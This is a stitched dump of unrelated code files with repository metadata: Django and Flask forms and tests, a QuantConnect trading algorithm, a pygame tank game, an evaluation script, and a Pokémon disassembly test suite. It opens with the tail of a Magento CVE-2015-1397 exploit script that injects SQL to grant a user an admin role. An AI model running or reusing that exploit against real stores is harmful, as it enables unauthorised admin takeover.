(parent_id,tree_level,sort_order," q += "role_type,user_id,role_name) " q += "VALUES (1,2,0,'U',(SELECT user_id FROM admin_user WHERE username =" q = q.replace("\n", "") q += " '{user}'),'Firstname');".format(user = self.user) pfilter = "popularity[from]=0&popularity[to]=3&popularity[field_expr]=0);{0}".format(q) print (LogColors.YELLOW + pfilter + "..." + LogColors.ENDC) data = { "___directive" : "e3tibG9jayB0eXBlPUFkbWluaHRtbC9yZXBvcnRfc2VhcmNoX2dyaWQgb3V0cHV0PWdldENzdkZpbGV9fQ", "filter" : base64.b64encode(pfilter.encode()).decode(), "forwarded" : 1 } r = self.session.post( self.url.rstrip("/") + "/index.php/admin/Cms_Wysiwyg/directive/index/", data = data ) if r.ok: print (LogColors.YELLOW + "auth: " + self.user + ":" + self.pswd + LogColors.ENDC) print (LogColors.GREEN + "successfully send payload. hacked :)" + LogColors.ENDC) else: print (LogColors.RED + "sending payload failed :(" + LogColors.ENDC) if __name__ == '__main__': parser = argparse.ArgumentParser() parser.add_argument('-u','--url', required = True, help = "target url") parser.add_argument('-user','--username', required = True, help = "auth username") parser.add_argument('-pswd','--password', required = True, help = "auth password") args = vars(parser.parse_args()) url = args["url"] user, pswd = args["username"], args["password"] cve = CVE2015_1397(url, user, pswd) cve.exploit()
UTF-8
Python
false
false
3,042
py
87
cve_2015_1397.py
83
0.60092
0.583498
0
64
46.515625
114
georgecai904/directconnect
2,173,253,453,747
f4ab26c97aa5f8e894145f10f9bb97de079ffc3d
d7d8a8b8ba443538db5465f21e1f0771c5f77d2e
/core/tests/test_sign_up.py
8e51b7f5f008ca331d55dd4df1b7e67bba7bffa1
[]
no_license
https://github.com/georgecai904/directconnect
cbe8462c166394d47d830633b2f460c4ec1b552b
30c59ea4beda330cca313e9274261cc2e8bc5cde
refs/heads/master
"2021-04-19T00:57:34.798000"
"2017-07-12T14:40:20"
"2017-07-12T14:40:20"
94,593,817
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from django.test import TestCase from core.forms import NewUserForm from django.contrib.auth.models import User class AuthTest(TestCase): def test_sign_up(self): data = { "username": "georgecai904", "password": "testpassword", "email": "mail@georgecai.com" } NewUserForm(data).save() self.assertEqual(User.objects.count(), 1)
UTF-8
Python
false
false
400
py
55
test_sign_up.py
35
0.6225
0.6125
0
14
27.571429
49
AboveColin/Webtechnologie_Project
2,130,303,791,987
79cbbdec93ca9c1682af74834effe370c4cd51ff
27aeefb14007ba389d937dfbe79eae09226db056
/stage/forms.py
e3e40f452d0084470868a0f50b1e75f2d0e4e3c6
[]
no_license
https://github.com/AboveColin/Webtechnologie_Project
bf97041c6d397e9acd19d627c05c271cf3766e48
ef1462c1243aa212438c77ad04b3479daa18b230
refs/heads/main
"2023-07-18T23:11:49.809000"
"2021-09-20T09:02:16"
"2021-09-20T09:02:16"
null
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
from flask_wtf import FlaskForm from wtforms import StringField, PasswordField, SubmitField, SelectField from wtforms.validators import data_required, Email, EqualTo from wtforms import ValidationError from stage.models import User, Begeleider # A form where a user can login using a submit button, his username and password. class Loginform(FlaskForm): username = StringField("Gebruikersnaam", validators=[data_required()]) password = PasswordField("Wachtwoord", validators=[data_required()]) submit = SubmitField("Inloggen") # A form where you can register as a user class Registratie(FlaskForm): email = StringField("E-mailadres", validators=[data_required(), Email()]) voornaam = StringField("Voornaam", validators=[data_required()]) achternaam = StringField("Achternaam", validators=[data_required()]) username = StringField("Gebruikersnaam", validators=[data_required()]) password = PasswordField("Wachtwoord", validators=[data_required(), EqualTo("pass_confirm", message="Wachtwoorden komen niet overeen")]) pass_confirm = PasswordField("Bevestig wachtwoord", validators=[data_required()]) submit = SubmitField("Registreer")
UTF-8
Python
false
false
1,201
py
19
forms.py
7
0.741049
0.741049
0
22
52.409091
140
decayboy/Lean.Algorithms
11,106,785,430,372
a1b646f2cd56db07f4df24173cdfed201097f7b6
3aa19b823a911968725605dd6d2019b92e96a477
/Python/GoogleTrends.py
c3e376b65ae40d03381f8ee6168b701dfb4db63e
[ "Apache-2.0" ]
permissive
https://github.com/decayboy/Lean.Algorithms
884c08dd1a23a4bebc75df1aa7bf298c85248126
0109addf768fea511ffb05ef164653797d097245
refs/heads/master
"2020-04-15T02:54:34.925000"
"2019-01-20T06:25:29"
"2019-01-20T06:25:29"
164,328,522
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import pandas as pd import numpy as np from datetime import timedelta ### <summary> ### Utilizes the monthly Google trends search term "debt" to anticipate potential price movements. ### Contrast other search terms and assets to produce interesting results. ### </summary> class BasicTemplateAlgorithm(QCAlgorithm): '''Basic template algorithm simply initializes the date range and cash''' def Initialize(self): '''Initialise the data and resolution required, as well as the cash and start-end dates for your algorithm. All algorithms must initialized.''' self.SetBrokerageModel(BrokerageName.InteractiveBrokersBrokerage) self.SetBenchmark("SPY") self.SetStartDate(2009,12, 1) #Set Start Date self.SetEndDate(2018,8,18) #Set End Date self.SetCash(100000) #Set Strategy Cash self.equity = ['SPY', 'IEF'] self.months = {} # Find more symbols here: http://quantconnect.com/data self.AddEquity(self.equity[0], Resolution.Hour) self.AddEquity(self.equity[1], Resolution.Hour) self.google_trends = pd.DataFrame(columns=['Week', 'interest']) self.file = self.Download("https://www.dropbox.com/s/lzah401ulb8cdba/debtMonthly.csv?dl=1") self.file = self.file.split("\n") i = 0 for row in self.file[1:]: one_row = row.split(",") self.google_trends.loc[i] = one_row i += 1 self.google_trends["MA3"] = self.google_trends.interest.rolling(3).mean() self.google_trends["MA18"] = self.google_trends.interest.rolling(18).mean() self.google_trends["Signal"] = self.google_trends["MA3"].astype('float') - self.google_trends["MA18"].astype('float') self.google_trends["Signal"] = self.google_trends["Signal"].shift(1) def OnData(self, data): '''OnData event is the primary entry point for your algorithm. Each new data point will be pumped in here. Arguments: data: Slice object keyed by symbol containing the stock data ''' date_today = self.Time.date() date_today = date_today.strftime(format='%Y-%m-%d') date_today = date_today[0:7] signal = self.google_trends.loc[self.google_trends.Week == date_today,"Signal"].iloc[0] try: invested = self.months[date_today] except: invested = "No" if self.Time.hour == 15 and invested == "No": if self.Portfolio[self.equity[0]].Quantity > 0 and signal > 0: self.Liquidate(self.equity[0]) if self.Portfolio[self.equity[1]].Quantity > 0 and signal < 0: self.Liquidate(self.equity[1]) if signal < 0 and self.Portfolio[self.equity[0]].Quantity == 0: self.SetHoldings(self.equity[0], 1) self.months[date_today] = "Yes" return if signal > 0 and self.Portfolio[self.equity[1]].Quantity == 0: self.SetHoldings(self.equity[1], 1) self.months[date_today] = "Yes" return
UTF-8
Python
false
false
3,141
py
2
GoogleTrends.py
1
0.610315
0.590258
0
68
45.191176
151
marcenavuc/battle_city
13,700,945,710,554
9ef0f7027bed2c91dfbe9fe9bddfd8a3b6cc9c14
17dfa7fc4e5a37fb2ef8d67126c2a633a1210a9e
/battle_city/game_objects/tanks.py
f0f21e9c414cad894fc04b86397efefb5d8e3931
[]
no_license
https://github.com/marcenavuc/battle_city
c404c528ebb3f273f1aa2d4ac91acf8891fb52da
75c164d73b6d060fbb4a052fad41fcfafc5687f1
refs/heads/main
"2023-02-10T00:31:57.629000"
"2020-12-30T15:38:18"
"2020-12-30T15:38:18"
305,317,156
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import logging import random import time import pygame from battle_city.config import RESPAWN_TIME from battle_city.game_objects import Missile from battle_city.game_objects.game_object import Directions, Movable,\ GameObject logger = logging.getLogger(__name__) class Tank(Movable): image = "media/images/tank.png" def __init__(self, position, direction=Directions.UP, *args, **kwars): super().__init__(position, *args, **kwars) self.velocity = 5 self.health = 1 self.speed = 5 self.is_shot = False self.period_duration = RESPAWN_TIME / 8 self.time_of_creation = time.time() def set_position(self, position: pygame.rect.Rect, level) \ -> pygame.rect.Rect: if self.is_collidelist(position, level.floor) >= 0: self.speed = self.velocity / 2 else: self.speed = self.velocity if ( self.in_borders(position, level) and self.is_collidelist(position, level.walls) < 0 and self.is_collidelist(position, level.blocks) < 0 ): return position return self.rect def shot(self, level): missile_position = self.move(self.direction, speed=25) if self.is_shot and missile_position.colliderect(missile_position): missile = Missile(missile_position, self.direction) level.missiles.append(missile) class EnemyTank(Tank): image = "media/images/tank.png" def __init__(self, position, *args, **kwars): super().__init__(position, *args, **kwars) def update(self, event: pygame.event, level, *args): if abs(self.time_of_creation - time.time()) < self.period_duration: self.random_walk(level) elif abs(self.time_of_creation - time.time()) < 2*self.period_duration: self.move_to_obj(level.player, level) else: self.move_to_obj(level.command_center, level) def random_walk(self, level): rand_number = random.randint(1, 1000) direction = self.direction if rand_number < 100: direction = Directions.random_direction() if rand_number < 50: self.shot(level) new_position = self.move(direction) self.rect = self.set_position(new_position, level) def move_to_obj(self, obj: GameObject, level): direction = self.direction if self.rect.y + self.speed < obj.rect.y: direction = Directions.DOWN elif self.rect.y - self.speed > obj.rect.y: direction = Directions.UP elif self.rect.x - self.speed < obj.rect.x: direction = Directions.RIGHT elif self.rect.x + self.speed > obj.rect.x: direction = Directions.LEFT new_position = self.move(direction) print(self.rect, new_position) new_rect = self.set_position(new_position, level) if self.rect == new_rect: logger.debug("Didn't found the way") self.period_duration *= 2 else: self.rect = new_rect class SpeedTank(EnemyTank): image = "media/images/tank.png" def __init__(self, position, *args, **kwars): super().__init__(position, *args, **kwars) self.speed = 10 class HeavyTank(EnemyTank): image = "media/images/heavy_tank.png" def __init__(self, position, *args, **kwars): super().__init__(position, *args, **kwars) self.speed = 2 self.health = 3 class RushTank(EnemyTank): image = "media/images/rush_tank.png" def __init__(self, position, *args, **kwars): super().__init__(position, *args, **kwars) self.speed = 5 def update(self, event: pygame.event, level, *args): self.move_to_obj(level.command_center, level)
UTF-8
Python
false
false
3,806
py
35
tanks.py
26
0.602995
0.595901
0
119
30.983193
79
JMHOO/planet-insight
4,629,974,775,692
5e98067d0ebf3f4aa3ecd7ba12eb83f53db5a6a0
79659f16658fadd105295497c84193b8017eb68a
/package/insight/agent.py
5042c0db4bd7853f0e484860558230ad6706fb34
[]
no_license
https://github.com/JMHOO/planet-insight
13a0652849f1c2b08d8a9b7968c24a4085b04ff8
d2a40459b3d2bdd5bfedb8f3707e19bc5e2e7678
refs/heads/master
"2021-09-11T00:54:29.128000"
"2018-04-05T05:09:32"
"2018-04-05T05:09:32"
103,308,427
3
2
null
false
"2018-04-05T05:09:33"
"2017-09-12T18:46:05"
"2018-01-12T01:43:54"
"2018-04-05T05:09:33"
436
2
1
1
JavaScript
false
null
from .storage import DBJobInstance, DBWorker import docker import platform import threading from random import randint from time import sleep from simple_settings import LazySettings import os settings = LazySettings('insight.applications.settings') class LocalDockerRunner(): def __init__(self, cli, gpu_count, image_name, volumes, commands, environments=None): self.docker = cli self.gpu_count = gpu_count self.image_name = image_name self.volumes = volumes self.commands = commands self.environments = environments self.containerId = "" self._t = None self.volumes = {"nvidia_driver_384.98": "/usr/local/nvidia"} self._reportor = DBWorker() def start(self): self._t = threading.Thread(target=self.run_container) self._t.start() def is_container_running(self): for container in self.docker.containers(all=False): if container['Id'] == self.containerId: return True return False def __del__(self): if self._t: self._t.join() def run_container(self): commands = '' if self.commands: commands = 'bash -c "' + self.commands + '"' binds = [] for s, d in self.volumes.items(): binds.append(s + ":" + d) volumes = list(self.volumes.values()) devices = ["/dev/nvidiactl:/dev/nvidiactl", "/dev/nvidia-uvm:/dev/nvidia-uvm"] for i in range(self.gpu_count): devices.append("/dev/nvidia{}:/dev/nvidia{}".format(i, i)) host_config = self.docker.create_host_config(devices=devices, binds=binds) response = self.docker.create_container( image=self.image_name, volumes=volumes, command=commands, environment=self.environments, host_config=host_config) if response['Warnings'] is None: self.containerId = response['Id'] else: print(response['Warnings']) return self.docker.start(self.containerId) print('Container {} started, waiting to finish...'.format(self.containerId)) # Keep running until container is exited while self.is_container_running(): sleep(1) self._reportor.report(platform.node(), system_info="{}", status='training') # Remove the container when it is finished self.docker.remove_container(self.containerId) print('Container exited') class AgentService(threading.Thread): def __init__(self, gpu_count=1): super().__init__() self.stoprequest = threading.Event() self.gpu_count = gpu_count self.worker_name = platform.node() def stop(self, timeout=None): self.stoprequest.set() super().join(timeout) def run(self): print('INFO::Agent service started.') try: aws_key = os.environ['AWS_ACCESS_KEY_ID'] aws_access = os.environ['AWS_SECRET_ACCESS_KEY'] aws_region = os.environ['AWS_DEFAULT_REGION'] except KeyError: print('ERROR::AWS credential not configed, exit.') return # docker instance self._docker = None try: if platform.system() is 'Windows': self._docker = docker.APIClient(base_url='npipe:////./pipe/docker_engine') else: self._docker = docker.APIClient(base_url='unix:///var/run/docker.sock') except: self._docker = None if self._docker is None: print('ERROR::No docker engine installed, abort!') return print('INFO::Connected to docker engine.') self._jobs = DBJobInstance() self._reportor = DBWorker() while not self.stoprequest.is_set(): random_sleep = randint(3, 10) # do job checking new_job = self._jobs.check_new_job() if new_job is not None: print('Got new jog: {}'.format(new_job)) pretrain_weights = '-w ' + new_job['pretrain'] #if pretrain_weights != 'NONE': # pretrain_weights = '-w ' + pretrain_weights #else: # pretrain_weights = '' monitor_service = settings.MONITOR['HOST'] + settings.MONITOR['PATH'] command = '/home/root/insight/run_worker.sh -i {} -m {} {} -d {} -s {}'.format( new_job['instance_name'], new_job['model_name'], pretrain_weights, new_job['dataset_name'], monitor_service ) print(command) environment = { 'AWS_ACCESS_KEY_ID': aws_key, 'AWS_SECRET_ACCESS_KEY': aws_access, 'AWS_DEFAULT_REGION': aws_region } self._reportor.report(platform.node(), system_info="{}", status='preparing') # do job and waiting runner = LocalDockerRunner( self._docker, self.gpu_count, settings.DOCKER['IMAGE'] + ':' + settings.DOCKER['VERSION'], volumes=None, commands=command, environments=environment ) # since we already in a thread, call block function instead of start another thread runner.run_container() # sleep random seconds between 3 ~ 10 print('INFO::No job, waiting {} seconds'.format(random_sleep)) self._reportor.report(platform.node(), system_info="{}", status='idle') sleep(random_sleep)
UTF-8
Python
false
false
5,755
py
61
agent.py
49
0.550304
0.548045
0
167
33.45509
127
Bibek-Bhandari/argument-mining-assignment
19,430,432,073,296
536d6d45526ee94b3f6b9bb8a0c1a847b25af466
6329df89021c2adf5f12f44a503bb415db58f9b7
/argument-mining-assignment/code/evaluation.py
6a06b7c21569e9cc38f54c4d79aa44788c8d3e7e
[]
no_license
https://github.com/Bibek-Bhandari/argument-mining-assignment
dae14e26863f317f156157a332e9c81f69db727d
13587b43cde29f3e5d0565b49b831a1fb8ace3c8
refs/heads/master
"2022-10-17T10:54:56.720000"
"2020-05-29T17:16:11"
"2020-05-29T17:16:11"
266,842,567
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import argparse from sklearn.metrics import f1_score def evaluation(path_to_ground_truth_bio, path_to_pred_bio): ''' Computing F1-score for each of the major-claim, claim, premises, and non-argumentative classes ''' gt_bio = [x.split('\t') for x in open(path_to_ground_truth_bio).readlines() if x !='\n'] pred_bio = [x.split('\t') for x in open(path_to_ground_truth_bio).readlines() if x !='\n'] assert len(gt_bio) == len(pred_bio), 'Number of tokens in the prediction file is different than the ground truth.' #F1-score overall tokens.. _, gt_y = zip(*gt_bio) _, pred_y = zip(*pred_bio) overall_f1_score = f1_score(gt_y, pred_y, average='macro') print('F1-SCORE: ', overall_f1_score ) if __name__ == '__main__': parser = argparse.ArgumentParser(description='Evaluate your approach') parser.add_argument('--gt_bio_path') parser.add_argument('--pred_bio_path') args = parser.parse_args() evaluation(args.gt_bio_path, args.pred_bio_path)
UTF-8
Python
false
false
1,015
py
6
evaluation.py
5
0.649261
0.642365
0
31
31.741935
118
pandrian75/pastiche
14,645,838,516,754
35149e7df278e3a0dcebb329d51dc33ebd6490b2
f3fd212093c372ba4da2ef3644eb65bf454616ba
/populate_db.py
3f4be66a3e394b0739de4abf622aa7a3e1e565b0
[]
no_license
https://github.com/pandrian75/pastiche
00ffb57fc5bba97aa190a44f59257b124e18a5fa
0422dd6fed6f7d5660256be602eade00b0f35d53
refs/heads/master
"2016-08-09T14:33:17.180000"
"2008-07-31T07:53:16"
"2008-07-31T07:53:16"
50,779,665
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
#!/usr/bin/env python import pastiche import os os.environ['DJANGO_SETTINGS_MODULE'] = 'pastiche.settings' from datetime import datetime from dada.models import Item, Event, Link, Location, Note, Tag, Task from django.contrib.auth.models import User def empty_table(table): for o in table.objects.all(): o.delete() ##empty_table(Item) ##empty_table(Node) #empty_table(Note) #empty_table(Link) #empty_table(Location) #empty_table(Tag) ##empty_table(Task) # TODO: probably need to delete according to hierarchy, recursively ##empty_table(Event) # TODO: same u1 = User.objects.get(username='andre') t1 = Task() t1.title = 'first task' t1.user = u1 t1.save() t2 = Task() t2.user = u1 t2.parent = t1 t2.title = 'second task' t2.save() t3 = Task() t3.user = u1 t3.parent = t1 t3.title = 'third task' t3.due = datetime.now() t3.save() t4 = Task() t4.user = u1 t4.parent = t2 t4.title = 'fourth task' t4.done = True t4.save() e1 = Event() e1.title = 'first event' e1.user = u1 e1.rating = 4 e1.start = datetime.now() e1.stop = datetime(2008, 10, 31, 12, 34, 56) e1.save() e2 = Event() e2.title = 'second event' e2.user = u1 e2.rating = 2 e2.start = datetime.now() e2.stop = datetime(2008, 10, 31, 12, 34, 56) e2.save() e3 = Event() e3.title = 'first subevent' e3.user = u1 e3.parent = e2 e3.start = datetime.now() e3.stop = datetime(2008, 9, 18, 12, 34, 56) e3.save() e4 = Event() e4.title = 'second subevent' e4.user = u1 e4.parent = e2 e4.start = datetime(2008, 9, 18, 12, 34, 56) e4.stop = datetime(2008, 10, 31, 12, 34, 56) e4.save() l1 = Link() l1.title = 'first link' l1.user = u1 l1.private = True l1.url = 'http://pastiche.info' l1.save() n1 = Note() n1.title = 'first note' n1.user = u1 n1.text = 'pastiche.info is a playground for experiments in technology, philosophy and arts.' n1.owner = l1 # add owner to note n1.save() n2 = Note() n2.title = 'second note' n2.user = u1 n2.text = 'pastiche.info is a playground for experiments in technology, philosophy and arts.' n2.save() l2 = Link() l2.title = 'second link' l2.user = u1 l2.private = True l2.url = 'http://pastiche.info' l2.save() l2.annotations.add(n2) # add note to owner (after save!) l3 = Link() l3.title = 'third link' l3.user = u1 l3.url = 'http://pastiche.info' l3.owner = t1 l3.save() l4 = Link() l4.title = 'fourth link' l4.user = u1 l4.url = 'http://pastiche.info' l4.owner = t1 l4.save() l5 = Link() l5.title = 'fifth link' l5.user = u1 l5.url = 'http://pastiche.info' l5.save() n3 = Note() n3.title = 'third note' n3.user = u1 n3.text = 'pastiche.info is a playground for experiments in technology, philosophy and arts.' n3.owner = t1 n3.save() n4 = Note() n4.title = 'fourth note' n4.user = u1 n4.text = 'pastiche.info is a playground for experiments in technology, philosophy and arts.' n4.owner = t3 n4.save() n5 = Note() n5.title = 'fifth note' n5.user = u1 n5.text = 'pastiche.info is a playground for experiments in technology, philosophy and arts.' n5.owner = e2 n5.save() n6 = Note() n6.title = 'sixth note' n6.user = u1 n6.text = 'pastiche.info is a playground for experiments in technology, philosophy and arts.' n6.owner = e4 n6.save() n7 = Note() n7.title = 'seventh note' n7.user = u1 n7.text = 'pastiche.info is a playground for experiments in technology, philosophy and arts.' n7.save() n8 = Note() n8.title = 'eighth note' n8.user = u1 n8.text = 'pastiche.info is a playground for experiments in technology, philosophy and arts.' n8.owner = l5 n8.save() h1 = Item() h1.user = u1 h1.title = 'Bookmarks' h1.save() l6 = Link() l6.title = 'first bookmark' l6.user = u1 l6.url = 'http://pastiche.info' l6.parent = h1 l6.save() l7 = Link() l7.title = 'second bookmark' l7.user = u1 l7.url = 'http://pastiche.info' l7.parent = h1 l7.save() h2 = Item() h2.user = u1 h2.title = 'More Bookmarks' h2.parent = h1 h2.save() l8 = Link() l8.title = 'third bookmark' l8.user = u1 l8.url = 'http://pastiche.info' l8.parent = h2 l8.save() l9 = Link() l9.title = 'fourth bookmark' l9.user = u1 l9.url = 'http://pastiche.info' l9.parent = h2 l9.save() print 'db populated.' ### #t = SimpleTask() #t.title = 'first task' #t.done = False #t.save() #n = SimpleNote() #n.title = 'first note' #n.text = "just some text for this note." #n.owner = t #n.save() ##t.annotations.add(n) #n.owner #n.owner.title #t.notes #t.notes.count() #t.notes.all()[0].title
UTF-8
Python
false
false
4,582
py
14
populate_db.py
6
0.639241
0.579005
0
228
18.096491
93
fran757/tdlog
2,516,850,876,334
21cab59ab42aacf10e899abbcccb6f43b42c65e0
477f1c24269b0c6f4a2ae58569bcb2d21b07a2d2
/test_game.py
5653216af8cf36705011d864c66c3d66144e4d66
[]
no_license
https://github.com/fran757/tdlog
9a9f368ad3fe1e798f3a2770e03f529e5fa7a5b4
74f7b2251de916f3dc870aacd7d701e599004c5d
refs/heads/master
"2022-04-06T02:25:18.065000"
"2020-02-04T10:21:20"
"2020-02-04T10:21:20"
218,588,437
0
0
null
null
null
null
null
null
null
null
null
null
null
null
null
import os import unittest from model import Grid from control import Game def fixture_name(name): """return appropriate filename""" return os.getcwd() + "/fixtures/" + name + ".txt" def build_fixture(name): """build game from fixture name""" return Game(Grid(fixture_name(name)), None) def extract_fixture(name): """extract fixture data""" data = [] with open(fixture_name(name)) as fixture: for line in fixture: data.append(line) return data def repr_fixture(name): """return repr of fixture""" with open(fixture_name(name)) as fixture: return "".join(["".join(line) for line in fixture]) def write_fixture(data): """write fixture to tmp file""" with open(fixture_name("tmp"), "w") as tmp_file: print(data, file=tmp_file) def expectation(move, expected): """Give fixture comparison result and related error message.""" value = extract_fixture("tmp") == extract_fixture(expected) message = "Grid is not as expected after {} :\n".format(move) + repr_fixture("tmp") return value, message class GlobalTest(unittest.TestCase): def test_all(self): """tests : moving to empty cell moving into cell switching character turning turnstile blocked turnstile pushing crate into hole falling into hole """ self.game = build_fixture("../model/grid") move = "1vv2^>3>>>" self.game.process_input(move) write_fixture(str(self.game.grid)) self.assertTrue(*expectation(move, "global")) if __name__ == "__main__": unittest.main()
UTF-8
Python
false
false
1,648
py
16
test_game.py
15
0.621966
0.620146
0
64
24.75
87
kanzure/pokecrystal-demo
386,547,101,625
b1a1a3a31aa41d6534dd4c81b67284836e479d71
77aef3246236c192850e419eb04c6fae0a7697ba
/extras/tests.py
61f46d6cb8d6f8f859f6b5682bd2c0dc608efe5e
[]
no_license
https://github.com/kanzure/pokecrystal-demo
ce61540f8d0fff4ddd253d15f9718201ef838b23
9ec5b0d12b1b3c0e164cb41cca8442989b3ada66
refs/heads/master
"2016-09-06T21:34:58.619000"
"2013-05-16T13:58:10"
"2013-05-16T13:58:10"
9,989,839
3
2
null
false
"2013-05-16T13:58:11"
"2013-05-10T20:33:17"
"2013-05-16T13:58:10"
"2013-05-16T13:58:10"
404
null
7
5
Assembly
null
null
# -*- coding: utf-8 -*- import os import sys import inspect from copy import copy import hashlib import random import json from interval_map import IntervalMap from chars import chars, jap_chars from romstr import ( RomStr, AsmList, ) from item_constants import ( item_constants, find_item_label_by_id, generate_item_constants, ) from pointers import ( calculate_bank, calculate_pointer, ) from pksv import ( pksv_gs, pksv_crystal, ) from labels import ( remove_quoted_text, line_has_comment_address, line_has_label, get_label_from_line, ) from crystal import ( rom, load_rom, rom_until, direct_load_rom, parse_script_engine_script_at, parse_text_engine_script_at, parse_text_at2, find_all_text_pointers_in_script_engine_script, SingleByteParam, HexByte, MultiByteParam, PointerLabelParam, ItemLabelByte, DollarSignByte, DecimalParam, rom_interval, map_names, Label, scan_for_predefined_labels, all_labels, write_all_labels, parse_map_header_at, old_parse_map_header_at, process_00_subcommands, parse_all_map_headers, translate_command_byte, map_name_cleaner, load_map_group_offsets, load_asm, asm, is_valid_address, index, how_many_until, grouper, get_pokemon_constant_by_id, generate_map_constant_labels, get_map_constant_label_by_id, get_id_for_map_constant_label, calculate_pointer_from_bytes_at, isolate_incbins, process_incbins, get_labels_between, generate_diff_insert, find_labels_without_addresses, rom_text_at, get_label_for, split_incbin_line_into_three, reset_incbins, ) # for testing all this crap try: import unittest2 as unittest except ImportError: import unittest # check for things we need in unittest if not hasattr(unittest.TestCase, 'setUpClass'): sys.stderr.write("The unittest2 module or Python 2.7 is required to run this script.") sys.exit(1) class TestCram(unittest.TestCase): "this is where i cram all of my unit tests together" @classmethod def setUpClass(cls): global rom cls.rom = direct_load_rom() rom = cls.rom @classmethod def tearDownClass(cls): del cls.rom def test_generic_useless(self): "do i know how to write a test?" self.assertEqual(1, 1) def test_map_name_cleaner(self): name = "hello world" cleaned_name = map_name_cleaner(name) self.assertNotEqual(name, cleaned_name) self.failUnless(" " not in cleaned_name) name = "Some Random Pokémon Center" cleaned_name = map_name_cleaner(name) self.assertNotEqual(name, cleaned_name) self.failIf(" " in cleaned_name) self.failIf("é" in cleaned_name) def test_grouper(self): data = range(0, 10) groups = grouper(data, count=2) self.assertEquals(len(groups), 5) data = range(0, 20) groups = grouper(data, count=2) self.assertEquals(len(groups), 10) self.assertNotEqual(data, groups) self.assertNotEqual(len(data), len(groups)) def test_direct_load_rom(self): rom = self.rom self.assertEqual(len(rom), 2097152) self.failUnless(isinstance(rom, RomStr)) def test_load_rom(self): global rom rom = None load_rom() self.failIf(rom == None) rom = RomStr(None) load_rom() self.failIf(rom == RomStr(None)) def test_load_asm(self): asm = load_asm() joined_lines = "\n".join(asm) self.failUnless("SECTION" in joined_lines) self.failUnless("bank" in joined_lines) self.failUnless(isinstance(asm, AsmList)) def test_rom_file_existence(self): "ROM file must exist" self.failUnless("baserom.gbc" in os.listdir("../")) def test_rom_md5(self): "ROM file must have the correct md5 sum" rom = self.rom correct = "9f2922b235a5eeb78d65594e82ef5dde" md5 = hashlib.md5() md5.update(rom) md5sum = md5.hexdigest() self.assertEqual(md5sum, correct) def test_bizarre_http_presence(self): rom_segment = self.rom[0x112116:0x112116+8] self.assertEqual(rom_segment, "HTTP/1.0") def test_rom_interval(self): address = 0x100 interval = 10 correct_strings = ['0x0', '0xc3', '0x6e', '0x1', '0xce', '0xed', '0x66', '0x66', '0xcc', '0xd'] byte_strings = rom_interval(address, interval, strings=True) self.assertEqual(byte_strings, correct_strings) correct_ints = [0, 195, 110, 1, 206, 237, 102, 102, 204, 13] ints = rom_interval(address, interval, strings=False) self.assertEqual(ints, correct_ints) def test_rom_until(self): address = 0x1337 byte = 0x13 bytes = rom_until(address, byte, strings=True) self.failUnless(len(bytes) == 3) self.failUnless(bytes[0] == '0xd5') bytes = rom_until(address, byte, strings=False) self.failUnless(len(bytes) == 3) self.failUnless(bytes[0] == 0xd5) def test_how_many_until(self): how_many = how_many_until(chr(0x13), 0x1337) self.assertEqual(how_many, 3) def test_calculate_bank(self): self.failUnless(calculate_bank(0x8000) == 2) self.failUnless(calculate_bank("0x9000") == 2) self.failUnless(calculate_bank(0) == 0) for address in [0x4000, 0x5000, 0x6000, 0x7000]: self.assertRaises(Exception, calculate_bank, address) def test_calculate_pointer(self): # for offset <= 0x4000 self.assertEqual(calculate_pointer(0x0000), 0x0000) self.assertEqual(calculate_pointer(0x3FFF), 0x3FFF) # for 0x4000 <= offset <= 0x7FFFF self.assertEqual(calculate_pointer(0x430F, bank=5), 0x1430F) # for offset >= 0x7FFF self.assertEqual(calculate_pointer(0x8FFF, bank=6), calculate_pointer(0x8FFF, bank=7)) def test_calculate_pointer_from_bytes_at(self): addr1 = calculate_pointer_from_bytes_at(0x100, bank=False) self.assertEqual(addr1, 0xc300) addr2 = calculate_pointer_from_bytes_at(0x100, bank=True) self.assertEqual(addr2, 0x2ec3) def test_rom_text_at(self): self.assertEquals(rom_text_at(0x112116, 8), "HTTP/1.0") def test_translate_command_byte(self): self.failUnless(translate_command_byte(crystal=0x0) == 0x0) self.failUnless(translate_command_byte(crystal=0x10) == 0x10) self.failUnless(translate_command_byte(crystal=0x40) == 0x40) self.failUnless(translate_command_byte(gold=0x0) == 0x0) self.failUnless(translate_command_byte(gold=0x10) == 0x10) self.failUnless(translate_command_byte(gold=0x40) == 0x40) self.assertEqual(translate_command_byte(gold=0x0), translate_command_byte(crystal=0x0)) self.failUnless(translate_command_byte(gold=0x52) == 0x53) self.failUnless(translate_command_byte(gold=0x53) == 0x54) self.failUnless(translate_command_byte(crystal=0x53) == 0x52) self.failUnless(translate_command_byte(crystal=0x52) == None) self.assertRaises(Exception, translate_command_byte, None, gold=0xA4) def test_pksv_integrity(self): "does pksv_gs look okay?" self.assertEqual(pksv_gs[0x00], "2call") self.assertEqual(pksv_gs[0x2D], "givepoke") self.assertEqual(pksv_gs[0x85], "waitbutton") self.assertEqual(pksv_crystal[0x00], "2call") self.assertEqual(pksv_crystal[0x86], "waitbutton") self.assertEqual(pksv_crystal[0xA2], "credits") def test_chars_integrity(self): self.assertEqual(chars[0x80], "A") self.assertEqual(chars[0xA0], "a") self.assertEqual(chars[0xF0], "¥") self.assertEqual(jap_chars[0x44], "ぱ") def test_map_names_integrity(self): def map_name(map_group, map_id): return map_names[map_group][map_id]["name"] self.assertEqual(map_name(2, 7), "Mahogany Town") self.assertEqual(map_name(3, 0x34), "Ilex Forest") self.assertEqual(map_name(7, 0x11), "Cerulean City") def test_load_map_group_offsets(self): addresses = load_map_group_offsets() self.assertEqual(len(addresses), 26, msg="there should be 26 map groups") addresses = load_map_group_offsets() self.assertEqual(len(addresses), 26, msg="there should still be 26 map groups") self.assertIn(0x94034, addresses) for address in addresses: self.assertGreaterEqual(address, 0x4000) self.failIf(0x4000 <= address <= 0x7FFF) self.failIf(address <= 0x4000) def test_index(self): self.assertTrue(index([1,2,3,4], lambda f: True) == 0) self.assertTrue(index([1,2,3,4], lambda f: f==3) == 2) def test_get_pokemon_constant_by_id(self): x = get_pokemon_constant_by_id self.assertEqual(x(1), "BULBASAUR") self.assertEqual(x(151), "MEW") self.assertEqual(x(250), "HO_OH") def test_find_item_label_by_id(self): x = find_item_label_by_id 